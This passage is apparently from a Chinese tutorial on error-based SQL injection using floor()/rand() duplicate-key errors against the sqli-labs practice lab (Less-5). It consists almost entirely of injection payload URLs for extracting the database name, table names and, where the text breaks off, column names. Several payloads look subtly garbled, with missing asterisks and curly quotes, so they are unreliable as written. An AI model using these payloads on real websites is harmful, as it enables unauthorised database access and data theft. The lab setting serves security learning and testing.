一.基于报错的 SQL 盲注------构造 payload 让信息通过错误提示回显出来
形如:
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(*),concat(floor(rand(0)2),(select (select (报错语句)) from information_schema.tables limit 0,1))x from information_schema.tables group by x)a)–+
1、通过floor报错,注入语句如下:
爆数据库:
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
爆表:
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
爆字段:
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from informa